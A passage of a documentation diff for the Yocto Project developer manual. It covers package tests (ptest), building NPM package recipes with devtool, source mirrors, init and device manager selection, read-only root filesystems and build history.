+least two items: the actual test, and a shell script (``run-ptest``)
+that starts the test. The shell script that starts the test must not
+contain the actual test - the script only starts the test. On the other
+hand, the test can be anything from a simple shell script that runs a
+binary and checks the output to an elaborate system of test binaries and
+data files.
+
+The test generates output in the format used by Automake:
+::
+
+   result: testname
+
+where the result can be ``PASS``, ``FAIL``, or ``SKIP``, and
+the testname can be any identifying string.
+
+For a list of Yocto Project recipes that are already enabled with ptest,
+see the :yocto_wiki:`Ptest </wiki/Ptest>` wiki page.
+
+.. note::
+
+   A recipe is "ptest-enabled" if it inherits the
+   :ref:`ptest <ref-classes-ptest>` class.
+
+Adding ptest to Your Build
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+To add package testing to your build, add the
+:term:`DISTRO_FEATURES` and
+:term:`EXTRA_IMAGE_FEATURES`
+variables to your ``local.conf`` file, which is found in the
+:term:`Build Directory`:
+::
+
+   DISTRO_FEATURES_append = " ptest"
+   EXTRA_IMAGE_FEATURES += "ptest-pkgs"
+
+Once your build is complete, the ptest files are installed into the
+``/usr/lib/package/ptest`` directory within the image, where ``package``
+is the name of the package.
+
+Running ptest
+~~~~~~~~~~~~~
+
+The ``ptest-runner`` package installs a shell script that loops through
+all installed ptest test suites and runs them in sequence. Consequently,
+you might want to add this package to your image.
+
+Getting Your Package Ready
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+In order to enable a recipe to run installed ptests on target hardware,
+you need to prepare the recipes that build the packages you want to
+test. Here is what you have to do for each recipe:
+
+-  *Be sure the recipe inherits
+   the* :ref:`ptest <ref-classes-ptest>` *class:*
+   Include the following line in each recipe:
+   ::
+
+      inherit ptest
+
+-  *Create run-ptest:* This script starts your test. Locate the
+   script where you will refer to it using
+   :term:`SRC_URI`. Here is an
+   example that starts a test for ``dbus``:
+   ::
+
+      #!/bin/sh
+      cd test
+      make -k runtest-TESTS
+
+-  *Ensure dependencies are met:* If the test adds build or runtime
+   dependencies that normally do not exist for the package (such as
+   requiring "make" to run the test suite), use the
+   :term:`DEPENDS` and
+   :term:`RDEPENDS` variables in
+   your recipe in order for the package to meet the dependencies. Here
+   is an example where the package has a runtime dependency on "make":
+   ::
+
+      RDEPENDS_${PN}-ptest += "make"
+
+-  *Add a function to build the test suite:* Not many packages support
+   cross-compilation of their test suites. Consequently, you usually
+   need to add a cross-compilation function to the package.
+
+   Many packages based on Automake compile and run the test suite by
+   using a single command such as ``make check``. However, the host
+   ``make check`` builds and runs on the same computer, while
+   cross-compiling requires that the package is built on the host but
+   executed for the target architecture (though often, as in the case
+   for ptest, the execution occurs on the host). The built version of
+   Automake that ships with the Yocto Project includes a patch that
+   separates building and execution. Consequently, packages that use the
+   unaltered, patched version of ``make check`` automatically
+   cross-compiles.
+
+   Regardless, you still must add a ``do_compile_ptest`` function to
+   build the test suite. Add a function similar to the following to your
+   recipe:
+   ::
+
+      do_compile_ptest() {
+          oe_runmake buildtest-TESTS
+      }
+
+-  *Ensure special configurations are set:* If the package requires
+   special configurations prior to compiling the test code, you must
+   insert a ``do_configure_ptest`` function into the recipe.
+
+-  *Install the test suite:* The ``ptest`` class automatically copies
+   the file ``run-ptest`` to the target and then runs make
+   ``install-ptest`` to run the tests. If this is not enough, you need
+   to create a ``do_install_ptest`` function and make sure it gets
+   called after the "make install-ptest" completes.
+
+Creating Node Package Manager (NPM) Packages
+--------------------------------------------
+
+`NPM <https://en.wikipedia.org/wiki/Npm_(software)>`__ is a package
+manager for the JavaScript programming language. The Yocto Project
+supports the NPM :ref:`fetcher <bitbake:bb-fetchers>`. You can
+use this fetcher in combination with
+:doc:`devtool <../ref-manual/ref-devtool-reference>` to create
+recipes that produce NPM packages.
+
+Two workflows exist that allow you to create NPM packages using
+``devtool``: the NPM registry modules method and the NPM project code
+method.
+
+.. note::
+
+   While it is possible to create NPM recipes manually, using
+   ``devtool`` is far simpler.
+
+Additionally, some requirements and caveats exist.
+
+.. _npm-package-creation-requirements:
+
+Requirements and Caveats
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+You need to be aware of the following before using ``devtool`` to create
+NPM packages:
+
+-  Of the two methods that you can use ``devtool`` to create NPM
+   packages, the registry approach is slightly simpler. However, you
+   might consider the project approach because you do not have to
+   publish your module in the NPM registry
+   (`npm-registry <https://docs.npmjs.com/misc/registry>`_), which
+   is NPM's public registry.
+
+-  Be familiar with
+   :doc:`devtool <../ref-manual/ref-devtool-reference>`.
+
+-  The NPM host tools need the native ``nodejs-npm`` package, which is
+   part of the OpenEmbedded environment. You need to get the package by
+   cloning the https://github.com/openembedded/meta-openembedded
+   repository out of GitHub. Be sure to add the path to your local copy
+   to your ``bblayers.conf`` file.
+
+-  ``devtool`` cannot detect native libraries in module dependencies.
+   Consequently, you must manually add packages to your recipe.
+
+-  While deploying NPM packages, ``devtool`` cannot determine which
+   dependent packages are missing on the target (e.g. the node runtime
+   ``nodejs``). Consequently, you need to find out what files are
+   missing and be sure they are on the target.
+
+-  Although you might not need NPM to run your node package, it is
+   useful to have NPM on your target. The NPM package name is
+   ``nodejs-npm``.
+
+.. _npm-using-the-registry-modules-method:
+
+Using the Registry Modules Method
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This section presents an example that uses the ``cute-files`` module,
+which is a file browser web application.
+
+.. note::
+
+   You must know the ``cute-files`` module version.
+
+The first thing you need to do is use ``devtool`` and the NPM fetcher to
+create the recipe:
+::
+
+   $ devtool add "npm://registry.npmjs.org;package=cute-files;version=1.0.2"
+
+The
+``devtool add`` command runs ``recipetool create`` and uses the same
+fetch URI to download each dependency and capture license details where
+possible. The result is a generated recipe.
+
+The recipe file is fairly simple and contains every license that
+``recipetool`` finds and includes the licenses in the recipe's
+:term:`LIC_FILES_CHKSUM`
+variables. You need to examine the variables and look for those with
+"unknown" in the :term:`LICENSE`
+field. You need to track down the license information for "unknown"
+modules and manually add the information to the recipe.
+
+``recipetool`` creates a "shrinkwrap" file for your recipe. Shrinkwrap
+files capture the version of all dependent modules. Many packages do not
+provide shrinkwrap files. ``recipetool`` create a shrinkwrap file as it
+runs.
+
+.. note::
+
+   A package is created for each sub-module. This policy is the only
+   practical way to have the licenses for all of the dependencies
+   represented in the license manifest of the image.
+
+The ``devtool edit-recipe`` command lets you take a look at the recipe:
+::
+
+   $ devtool edit-recipe cute-files
+   SUMMARY = "Turn any folder on your computer into a cute file browser, available on the local network."
+   LICENSE = "MIT & ISC & Unknown"
+   LIC_FILES_CHKSUM = "file://LICENSE;md5=71d98c0a1db42956787b1909c74a86ca \
+       file://node_modules/toidentifier/LICENSE;md5=1a261071a044d02eb6f2bb47f51a3502 \
+       file://node_modules/debug/LICENSE;md5=ddd815a475e7338b0be7a14d8ee35a99 \
+       ...
+   SRC_URI = " \
+       npm://registry.npmjs.org/;package=cute-files;version=${PV} \
+       npmsw://${THISDIR}/${BPN}/npm-shrinkwrap.json \
+       "
+   S = "${WORKDIR}/npm"
+   inherit npm LICENSE_${PN} = "MIT"
+   LICENSE_${PN}-accepts = "MIT"
+   LICENSE_${PN}-array-flatten = "MIT"
+   ...
+   LICENSE_${PN}-vary = "MIT"
+
+Three key points exist in the previous example:
+
+-  :term:`SRC_URI` uses the NPM
+   scheme so that the NPM fetcher is used.
+
+-  ``recipetool`` collects all the license information. If a
+   sub-module's license is unavailable, the sub-module's name appears in
+   the comments.
+
+-  The ``inherit npm`` statement causes the
+   :ref:`npm <ref-classes-npm>` class to package
+   up all the modules.
+
+You can run the following command to build the ``cute-files`` package:
+::
+
+   $ devtool build cute-files
+
+Remember that ``nodejs`` must be installed on
+the target before your package.
+
+Assuming 192.168.7.2 for the target's IP address, use the following
+command to deploy your package:
+::
+
+   $ devtool deploy-target -s cute-files root@192.168.7.2
+
+Once the package is installed on the target, you can
+test the application:
+
+.. note::
+
+   Because of a known issue, you cannot simply run ``cute-files`` as you would
+   if you had run ``npm install``.
+
+::
+
+  $ cd /usr/lib/node_modules/cute-files
+  $ node cute-files.js
+
+On a browser,
+go to ``http://192.168.7.2:3000`` and you see the following:
+
+.. image:: figures/cute-files-npm-example.png
+   :align: center
+
+You can find the recipe in ``workspace/recipes/cute-files``. You can use
+the recipe in any layer you choose.
+
+.. _npm-using-the-npm-projects-method:
+
+Using the NPM Projects Code Method
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Although it is useful to package modules already in the NPM registry,
+adding ``node.js`` projects under development is a more common developer
+use case.
+
+This section covers the NPM projects code method, which is very similar
+to the "registry" approach described in the previous section. In the NPM
+projects method, you provide ``devtool`` with an URL that points to the
+source files.
+
+Replicating the same example, (i.e. ``cute-files``) use the following
+command:
+::
+
+   $ devtool add https://github.com/martinaglv/cute-files.git
+
+The
+recipe this command generates is very similar to the recipe created in
+the previous section. However, the ``SRC_URI`` looks like the following:
+::
+
+   SRC_URI = " \
+       git://github.com/martinaglv/cute-files.git;protocol=https \
+       npmsw://${THISDIR}/${BPN}/npm-shrinkwrap.json \
+       "
+
+In this example,
+the main module is taken from the Git repository and dependencies are
+taken from the NPM registry. Other than those differences, the recipe is
+basically the same between the two methods. You can build and deploy the
+package exactly as described in the previous section that uses the
+registry modules method.
+
+Adding custom metadata to packages
+----------------------------------
+
+The variable
+:term:`PACKAGE_ADD_METADATA`
+can be used to add additional metadata to packages. This is reflected in
+the package control/spec file. To take the ipk format for example, the
+CONTROL file stored inside would contain the additional metadata as
+additional lines.
+
+The variable can be used in multiple ways, including using suffixes to
+set it for a specific package type and/or package. Note that the order
+of precedence is the same as this list:
+
+-  ``PACKAGE_ADD_METADATA_<PKGTYPE>_<PN>``
+
+-  ``PACKAGE_ADD_METADATA_<PKGTYPE>``
+
+-  ``PACKAGE_ADD_METADATA_<PN>``
+
+-  ``PACKAGE_ADD_METADATA``
+
+`<PKGTYPE>` is a parameter and expected to be a distinct name of specific
+package type:
+
+-  IPK for .ipk packages
+
+-  DEB for .deb packages
+
+-  RPM for .rpm packages
+
+`<PN>` is a parameter and expected to be a package name.
+
+The variable can contain multiple [one-line] metadata fields separated
+by the literal sequence '\\n'. The separator can be redefined using the
+variable flag ``separator``.
+
+The following is an example that adds two custom fields for ipk
+packages:
+::
+
+   PACKAGE_ADD_METADATA_IPK = "Vendor: CustomIpk\nGroup:Applications/Spreadsheets"
+
+Efficiently Fetching Source Files During a Build
+================================================
+
+The OpenEmbedded build system works with source files located through
+the :term:`SRC_URI` variable. When
+you build something using BitBake, a big part of the operation is
+locating and downloading all the source tarballs. For images,
+downloading all the source for various packages can take a significant
+amount of time.
+
+This section shows you how you can use mirrors to speed up fetching
+source files and how you can pre-fetch files all of which leads to more
+efficient use of resources and time.
+
+Setting up Effective Mirrors
+----------------------------
+
+A good deal that goes into a Yocto Project build is simply downloading
+all of the source tarballs. Maybe you have been working with another
+build system (OpenEmbedded or Angstrom) for which you have built up a
+sizable directory of source tarballs. Or, perhaps someone else has such
+a directory for which you have read access. If so, you can save time by
+adding statements to your configuration file so that the build process
+checks local directories first for existing tarballs before checking the
+Internet.
+
+Here is an efficient way to set it up in your ``local.conf`` file:
+::
+
+   SOURCE_MIRROR_URL ?= "file:///home/you/your-download-dir/"
+   INHERIT += "own-mirrors"
+   BB_GENERATE_MIRROR_TARBALLS = "1"
+   # BB_NO_NETWORK = "1"
+
+In the previous example, the
+:term:`BB_GENERATE_MIRROR_TARBALLS`
+variable causes the OpenEmbedded build system to generate tarballs of
+the Git repositories and store them in the
+:term:`DL_DIR` directory. Due to
+performance reasons, generating and storing these tarballs is not the
+build system's default behavior.
+
+You can also use the
+:term:`PREMIRRORS` variable. For
+an example, see the variable's glossary entry in the Yocto Project
+Reference Manual.
+
+Getting Source Files and Suppressing the Build
+----------------------------------------------
+
+Another technique you can use to ready yourself for a successive string
+of build operations, is to pre-fetch all the source files without
+actually starting a build. This technique lets you work through any
+download issues and ultimately gathers all the source files into your
+download directory :ref:`structure-build-downloads`,
+which is located with :term:`DL_DIR`.
+
+Use the following BitBake command form to fetch all the necessary
+sources without starting the build:
+::
+
+   $ bitbake target --runall=fetch
+
+This
+variation of the BitBake command guarantees that you have all the
+sources for that BitBake target should you disconnect from the Internet
+and want to do the build later offline.
+
+Selecting an Initialization Manager
+===================================
+
+By default, the Yocto Project uses SysVinit as the initialization
+manager. However, support also exists for systemd, which is a full
+replacement for init with parallel starting of services, reduced shell
+overhead and other features that are used by many distributions.
+
+Within the system, SysVinit treats system components as services. These
+services are maintained as shell scripts stored in the ``/etc/init.d/``
+directory. Services organize into different run levels. This
+organization is maintained by putting links to the services in the
+``/etc/rcN.d/`` directories, where `N/` is one of the following options:
+"S", "0", "1", "2", "3", "4", "5", or "6".
+
+.. note::
+
+   Each runlevel has a dependency on the previous runlevel. This
+   dependency allows the services to work properly.
+
+In comparison, systemd treats components as units. Using units is a
+broader concept as compared to using a service. A unit includes several
+different types of entities. Service is one of the types of entities.
+The runlevel concept in SysVinit corresponds to the concept of a target
+in systemd, where target is also a type of supported unit.
+
+In a SysVinit-based system, services load sequentially (i.e. one by one)
+during init and parallelization is not supported. With systemd, services
+start in parallel. Needless to say, the method can have an impact on
+system startup performance.
+
+If you want to use SysVinit, you do not have to do anything. But, if you
+want to use systemd, you must take some steps as described in the
+following sections.
+
+Using systemd Exclusively
+-------------------------
+
+Set these variables in your distribution configuration file as follows:
+::
+
+   DISTRO_FEATURES_append = " systemd"
+   VIRTUAL-RUNTIME_init_manager = "systemd"
+
+You can also prevent the SysVinit distribution feature from
+being automatically enabled as follows:
+::
+
+   DISTRO_FEATURES_BACKFILL_CONSIDERED = "sysvinit"
+
+Doing so removes any
+redundant SysVinit scripts.
+
+To remove initscripts from your image altogether, set this variable
+also:
+::
+
+   VIRTUAL-RUNTIME_initscripts = ""
+
+For information on the backfill variable, see
+:term:`DISTRO_FEATURES_BACKFILL_CONSIDERED`.
+
+Using systemd for the Main Image and Using SysVinit for the Rescue Image
+------------------------------------------------------------------------
+
+Set these variables in your distribution configuration file as follows:
+::
+
+   DISTRO_FEATURES_append = " systemd"
+   VIRTUAL-RUNTIME_init_manager = "systemd"
+
+Doing so causes your main image to use the
+``packagegroup-core-boot.bb`` recipe and systemd. The rescue/minimal
+image cannot use this package group. However, it can install SysVinit
+and the appropriate packages will have support for both systemd and
+SysVinit.
+
+.. _selecting-dev-manager:
+
+Selecting a Device Manager
+==========================
+
+The Yocto Project provides multiple ways to manage the device manager
+(``/dev``):
+
+-  Persistent and Pre-Populated\ ``/dev``: For this case, the ``/dev``
+   directory is persistent and the required device nodes are created
+   during the build.
+
+-  Use ``devtmpfs`` with a Device Manager: For this case, the ``/dev``
+   directory is provided by the kernel as an in-memory file system and
+   is automatically populated by the kernel at runtime. Additional
+   configuration of device nodes is done in user space by a device
+   manager like ``udev`` or ``busybox-mdev``.
+
+.. _static-dev-management:
+
+Using Persistent and Pre-Populated\ ``/dev``
+--------------------------------------------
+
+To use the static method for device population, you need to set the
+:term:`USE_DEVFS` variable to "0"
+as follows:
+::
+
+   USE_DEVFS = "0"
+
+The content of the resulting ``/dev`` directory is defined in a Device
+Table file. The
+:term:`IMAGE_DEVICE_TABLES`
+variable defines the Device Table to use and should be set in the
+machine or distro configuration file. Alternatively, you can set this
+variable in your ``local.conf`` configuration file.
+
+If you do not define the ``IMAGE_DEVICE_TABLES`` variable, the default
+``device_table-minimal.txt`` is used:
+::
+
+   IMAGE_DEVICE_TABLES = "device_table-mymachine.txt"
+
+The population is handled by the ``makedevs`` utility during image
+creation:
+
+.. _devtmpfs-dev-management:
+
+Using ``devtmpfs`` and a Device Manager
+---------------------------------------
+
+To use the dynamic method for device population, you need to use (or be
+sure to set) the :term:`USE_DEVFS`
+variable to "1", which is the default:
+::
+
+   USE_DEVFS = "1"
+
+With this
+setting, the resulting ``/dev`` directory is populated by the kernel
+using ``devtmpfs``. Make sure the corresponding kernel configuration
+variable ``CONFIG_DEVTMPFS`` is set when building you build a Linux
+kernel.
+
+All devices created by ``devtmpfs`` will be owned by ``root`` and have
+permissions ``0600``.
+
+To have more control over the device nodes, you can use a device manager
+like ``udev`` or ``busybox-mdev``. You choose the device manager by
+defining the ``VIRTUAL-RUNTIME_dev_manager`` variable in your machine or
+distro configuration file. Alternatively, you can set this variable in
+your ``local.conf`` configuration file:
+::
+
+   VIRTUAL-RUNTIME_dev_manager = "udev"
+
+   # Some alternative values
+   # VIRTUAL-RUNTIME_dev_manager = "busybox-mdev"
+   # VIRTUAL-RUNTIME_dev_manager = "systemd"
+
+.. _platdev-appdev-srcrev:
+
+Using an External SCM
+=====================
+
+If you're working on a recipe that pulls from an external Source Code
+Manager (SCM), it is possible to have the OpenEmbedded build system
+notice new recipe changes added to the SCM and then build the resulting
+packages that depend on the new recipes by using the latest versions.
+This only works for SCMs from which it is possible to get a sensible
+revision number for changes. Currently, you can do this with Apache
+Subversion (SVN), Git, and Bazaar (BZR) repositories.
+
+To enable this behavior, the :term:`PV` of
+the recipe needs to reference
+:term:`SRCPV`. Here is an example:
+::
+
+   PV = "1.2.3+git${SRCPV}"
+
+Then, you can add the following to your
+``local.conf``:
+::
+
+   SRCREV_pn-PN = "${AUTOREV}"
+
+:term:`PN` is the name of the recipe for
+which you want to enable automatic source revision updating.
+
+If you do not want to update your local configuration file, you can add
+the following directly to the recipe to finish enabling the feature:
+::
+
+   SRCREV = "${AUTOREV}"
+
+The Yocto Project provides a distribution named ``poky-bleeding``, whose
+configuration file contains the line:
+::
+
+   require conf/distro/include/poky-floating-revisions.inc
+
+This line pulls in the
+listed include file that contains numerous lines of exactly that form:
+::
+
+   #SRCREV_pn-opkg-native ?= "${AUTOREV}"
+   #SRCREV_pn-opkg-sdk ?= "${AUTOREV}"
+   #SRCREV_pn-opkg ?= "${AUTOREV}"
+   #SRCREV_pn-opkg-utils-native ?= "${AUTOREV}"
+   #SRCREV_pn-opkg-utils ?= "${AUTOREV}"
+   SRCREV_pn-gconf-dbus ?= "${AUTOREV}"
+   SRCREV_pn-matchbox-common ?= "${AUTOREV}"
+   SRCREV_pn-matchbox-config-gtk ?= "${AUTOREV}"
+   SRCREV_pn-matchbox-desktop ?= "${AUTOREV}"
+   SRCREV_pn-matchbox-keyboard ?= "${AUTOREV}"
+   SRCREV_pn-matchbox-panel-2 ?= "${AUTOREV}"
+   SRCREV_pn-matchbox-themes-extra ?= "${AUTOREV}"
+   SRCREV_pn-matchbox-terminal ?= "${AUTOREV}"
+   SRCREV_pn-matchbox-wm ?= "${AUTOREV}"
+   SRCREV_pn-settings-daemon ?= "${AUTOREV}"
+   SRCREV_pn-screenshot ?= "${AUTOREV}"
+   . . .
+
+These lines allow you to
+experiment with building a distribution that tracks the latest
+development source for numerous packages.
+
+.. note::
+
+   The ``poky-bleeding`` distribution is not tested on a regular basis. Keep
+   this in mind if you use it.
+
+Creating a Read-Only Root Filesystem
+====================================
+
+Suppose, for security reasons, you need to disable your target device's
+root filesystem's write permissions (i.e. you need a read-only root
+filesystem). Or, perhaps you are running the device's operating system
+from a read-only storage device. For either case, you can customize your
+image for that behavior.
+
+.. note::
+
+   Supporting a read-only root filesystem requires that the system and
+   applications do not try to write to the root filesystem. You must
+   configure all parts of the target system to write elsewhere, or to
+   gracefully fail in the event of attempting to write to the root
+   filesystem.
+
+Creating the Root Filesystem
+----------------------------
+
+To create the read-only root filesystem, simply add the
+"read-only-rootfs" feature to your image, normally in one of two ways.
+The first way is to add the "read-only-rootfs" image feature in the
+image's recipe file via the ``IMAGE_FEATURES`` variable:
+::
+
+   IMAGE_FEATURES += "read-only-rootfs"
+
+As an alternative, you can add the same feature
+from within your build directory's ``local.conf`` file with the
+associated ``EXTRA_IMAGE_FEATURES`` variable, as in:
+::
+
+   EXTRA_IMAGE_FEATURES = "read-only-rootfs"
+
+For more information on how to use these variables, see the
+":ref:`usingpoky-extend-customimage-imagefeatures`"
+section. For information on the variables, see
+:term:`IMAGE_FEATURES` and
+:term:`EXTRA_IMAGE_FEATURES`.
+
+Post-Installation Scripts and Read-Only Root Filesystem
+-------------------------------------------------------
+
+It is very important that you make sure all post-Installation
+(``pkg_postinst``) scripts for packages that are installed into the
+image can be run at the time when the root filesystem is created during
+the build on the host system. These scripts cannot attempt to run during
+first-boot on the target device. With the "read-only-rootfs" feature
+enabled, the build system checks during root filesystem creation to make
+sure all post-installation scripts succeed. If any of these scripts
+still need to be run after the root filesystem is created, the build
+immediately fails. These build-time checks ensure that the build fails
+rather than the target device fails later during its initial boot
+operation.
+
+Most of the common post-installation scripts generated by the build
+system for the out-of-the-box Yocto Project are engineered so that they
+can run during root filesystem creation (e.g. post-installation scripts
+for caching fonts). However, if you create and add custom scripts, you
+need to be sure they can be run during this file system creation.
+
+Here are some common problems that prevent post-installation scripts
+from running during root filesystem creation:
+
+-  *Not using $D in front of absolute paths:* The build system defines
+   ``$``\ :term:`D` when the root
+   filesystem is created. Furthermore, ``$D`` is blank when the script
+   is run on the target device. This implies two purposes for ``$D``:
+   ensuring paths are valid in both the host and target environments,
+   and checking to determine which environment is being used as a method
+   for taking appropriate actions.
+
+-  *Attempting to run processes that are specific to or dependent on the
+   target architecture:* You can work around these attempts by using
+   native tools, which run on the host system, to accomplish the same
+   tasks, or by alternatively running the processes under QEMU, which
+   has the ``qemu_run_binary`` function. For more information, see the
+   :ref:`qemu <ref-classes-qemu>` class.
+
+Areas With Write Access
+-----------------------
+
+With the "read-only-rootfs" feature enabled, any attempt by the target
+to write to the root filesystem at runtime fails. Consequently, you must
+make sure that you configure processes and applications that attempt
+these types of writes do so to directories with write access (e.g.
+``/tmp`` or ``/var/run``).
+
+Maintaining Build Output Quality
+================================
+
+Many factors can influence the quality of a build. For example, if you
+upgrade a recipe to use a new version of an upstream software package or
+you experiment with some new configuration options, subtle changes can
+occur that you might not detect until later. Consider the case where
+your recipe is using a newer version of an upstream package. In this
+case, a new version of a piece of software might introduce an optional
+dependency on another library, which is auto-detected. If that library
+has already been built when the software is building, the software will
+link to the built library and that library will be pulled into your
+image along with the new software even if you did not want the library.
+
+The :ref:`buildhistory <ref-classes-buildhistory>`
+class exists to help you maintain the quality of your build output. You
+can use the class to highlight unexpected and possibly unwanted changes
+in the build output. When you enable build history, it records
+information about the contents of each package and image and then
+commits that information to a local Git repository where you can examine
+the information.
+
+The remainder of this section describes the following:
+
+-  :ref:`How you can enable and disable build history <dev-manual/dev-manual-common-tasks:enabling and disabling build history>`
+
+-  :ref:`How to understand what the build history contains <dev-manual/dev-manual-common-tasks:understanding what the build history contains>`
+
+-  :ref:`How to limit the information used for build history <dev-manual/dev-manual-common-tasks:using build history to gather image information only>`
+
+-  :ref:`How to examine the build history from both a command-line and web interface <dev-manual/dev-manual-common-tasks:examining build history information>`
+
+Enabling and Disabling Build History
+------------------------------------
+
+Build history is disabled by default. To enable it, add the following
+``INHERIT`` statement and set the
+:term:`BUILDHISTORY_COMMIT`
+variable to "1" at the end of your ``conf/local.conf`` file found in the
+:term:`Build Directory`:
+::
+
+   INHERIT += "buildhistory"
+   BUILDHISTORY_COMMIT = "1"
+
+Enabling build history as
+previously described causes the OpenEmbedded build system to collect
+build output information and commit it as a single commit to a local
+:ref:`overview-manual/overview-manual-development-environment:git` repository.
+
+.. note::
+
+   Enabling build history increases your build times slightly,
+   particularly for images, and increases the amount of disk space used
+   during the build.
+
+You can disable build history by removing the previous statements from
+your ``conf/local.conf`` file.
+
+Understanding What the Build History Contains
+---------------------------------------------
+
+Build history information is kept in
+``${``\ :term:`TOPDIR`\ ``}/buildhistory``
+in the Build Directory as defined by the
+:term:`BUILDHISTORY_DIR`
+variable. The following is an example abbreviated listing:
+
+.. image:: figures/buildhistory.png
+   :align: center
+
+At the top level, a ``metadata-revs`` file exists that lists the
+revisions of the repositories for the enabled layers when the build was
+produced. The rest of the data splits into separate ``packages``,
+``images`` and ``sdk`` directories, the contents of which are described
+as follows.
+
+Build History Package Information
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The history for each package contains a text file that has name-value
+pairs with information about the package. For example,
+``buildhistory/packages/i586-poky-linux/busybox/busybox/latest``
+contains the following:
+
+.. code-block:: none
+
+   PV = 1.22.1
+   PR = r32
+   RPROVIDES =
+   RDEPENDS = glibc (>= 2.20) update-alternatives-opkg
+   RRECOMMENDS = busybox-syslog busybox-udhcpc update-rc.d
+   PKGSIZE = 540168
+   FILES = /usr/bin/* /usr/sbin/* /usr/lib/busybox/* /usr/lib/lib*.so.* \
+      /etc /com /var /bin/* /sbin/* /lib/*.so.* /lib/udev/rules.d \
+      /usr/lib/udev/rules.d /usr/share/busybox /usr/lib/busybox/* \
+      /usr/share/pixmaps /usr/share/applications /usr/share/idl \
+      /usr/share/omf /usr/share/sounds /usr/lib/bonobo/servers
+   FILELIST = /bin/busybox /bin/busybox.nosuid /bin/busybox.suid /bin/sh \
+      /etc/busybox.links.nosuid /etc/busybox.links.suid
+
+Most of these
+name-value pairs correspond to variables used to produce the package.
+The exceptions are ``FILELIST``, which is the actual list of files in
+the package, and ``PKGSIZE``, which is the total size of files in the
+package in bytes.
+
+A file also exists that corresponds to the recipe from which the package
+came (e.g. ``buildhistory/packages/i586-poky-linux/busybox/latest``):
+
+.. code-block:: none
+
+   PV = 1.22.1
+   PR = r32
+   DEPENDS = initscripts kern-tools-native update-rc.d-native \
+      virtual/i586-poky-linux-compilerlibs virtual/i586-poky-linux-gcc \
+      virtual/libc virtual/update-alternatives
+   PACKAGES = busybox-ptest busybox-httpd busybox-udhcpd busybox-udhcpc \
+      busybox-syslog busybox-mdev busybox-hwclock busybox-dbg \
+      busybox-staticdev busybox-dev busybox-doc busybox-locale busybox
+
+Finally, for those recipes fetched from a version control system (e.g.,
+Git), a file exists that lists source revisions that are specified in
+the recipe and lists the actual revisions used during the build. Listed
+and actual revisions might differ when
+:term:`SRCREV` is set to
+${:term:`AUTOREV`}. Here is an
+example assuming
+``buildhistory/packages/qemux86-poky-linux/linux-yocto/latest_srcrev``):
+::
+
+   # SRCREV_machine = "38cd560d5022ed2dbd1ab0dca9642e47c98a0aa1"
+   SRCREV_machine = "38cd560d5022ed2dbd1ab0dca9642e47c98a0aa1"
+   # SRCREV_meta = "a227f20eff056e511d504b2e490f3774ab260d6f"
+   SRCREV_meta ="a227f20eff056e511d504b2e490f3774ab260d6f"
+
+You can use the
+``buildhistory-collect-srcrevs`` command with the ``-a`` option to
+collect the stored ``SRCREV`` values from build history and report them
+in a format suitable for use in global configuration (e.g.,
+``local.conf`` or a distro include file) to override floating
+``AUTOREV`` values to a fixed set of revisions. Here is some example
+output from this command:
+::
+
+   $ buildhistory-collect-srcrevs -a
+   # i586-poky-linux
+   SRCREV_pn-glibc = "b8079dd0d360648e4e8de48656c5c38972621072"
+   SRCREV_pn-glibc-initial = "b8079dd0d360648e4e8de48656c5c38972621072"
+   SRCREV_pn-opkg-utils = "53274f087565fd45d8452c5367997ba6a682a37a"
+   SRCREV_pn-kmod = "fd56638aed3fe147015bfa10ed4a5f7491303cb4"
+   # x86_64-linux
+   SRCREV_pn-gtk-doc-stub-native = "1dea266593edb766d6d898c79451ef193eb17cfa"
+   SRCREV_pn-dtc-native = "65cc4d2748a2c2e6f27f1cf39e07a5dbabd80ebf"
+   SRCREV_pn-update-rc.d-native = "eca680ddf28d024954895f59a241a622dd575c11"
+   SRCREV_glibc_pn-cross-localedef-native = "b8079dd0d360648e4e8de48656c5c38972621072"
+   SRCREV_localedef_pn-cross-localedef-native = "c833367348d39dad7ba018990bfdaffaec8e9ed3"
+   SRCREV_pn-prelink-native = "faa069deec99bf61418d0bab831c83d7c1b797ca"
+   SRCREV_pn-opkg-utils-native = "53274f087565fd45d8452c5367997ba6a682a37a"
+   SRCREV_pn-kern-tools-native = "23345b8846fe4bd167efdf1bd8a1224b2ba9a5ff"
+   SRCREV_pn-kmod-native = "fd56638aed3fe147015bfa10ed4a5f7491303cb4"
+   # qemux86-poky-linux
+   SRCREV_machine_pn-linux-yocto = "38cd560d5022ed2dbd1ab0dca9642e47c98a0aa1"
+   SRCREV_meta_pn-linux-yocto = "a227f20eff056e511d504b2e490f3774ab260d6f"
+   # all-poky-linux
+   SRCREV_pn-update-rc.d = "eca680ddf28d024954895f59a241a622dd575c11"
+
+.. note::
+
+   Here are some notes on using the ``buildhistory-collect-srcrevs`` command:
+
+   -  By default, only values where the ``SRCREV`` was not hardcoded
+      (usually when ``AUTOREV`` is used) are reported. Use the ``-a``
+      option to see all ``SRCREV`` values.
+
+   -  The output statements might not have any effect if overrides are
+      applied elsewhere in the build system configuration. Use the
+      ``-f`` option to add the ``forcevariable`` override to each output
+      line if you need to work around this restriction.
+
+   -  The script does apply special handling when building for multiple
+      machines. However, the script does place a comment before each set
+      of values that specifies which triplet to which they belong as
+      previously shown (e.g., ``i586-poky-linux``).
+
+Build History Image Information
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The files produced for each image are as follows:
+
+-  ``image-files:`` A directory containing selected files from the root
+   filesystem. The files are defined by
+   :term:`BUILDHISTORY_IMAGE_FILES`.
+
+-  ``build-id.txt:`` Human-readable information about the build
+   configuration and metadata source revisions. This file contains the
+   full build header as printed by BitBake.
+
+-  ``*.dot:`` Dependency graphs for the image that are compatible with
+   ``graphviz``.
+
+-  ``files-in-image.txt:`` A list of files in the image with
+   permissions, owner, group, size, and symlink information.
+
+-  ``image-info.txt:`` A text file containing name-value pairs with
+   information about the image. See the following listing example for
+   more information.
+
+-  ``installed-package-names.txt:`` A list of installed packages by name
+   only.
+
+-  ``installed-package-sizes.txt:`` A list of installed packages ordered
+   by size.
+
+-  ``installed-packages.txt:`` A list of installed packages with full
+   package filenames.
+
+.. note::
+
+   Installed package information is able to be gathered and produced
+   even if package management is disabled for the final image.
+
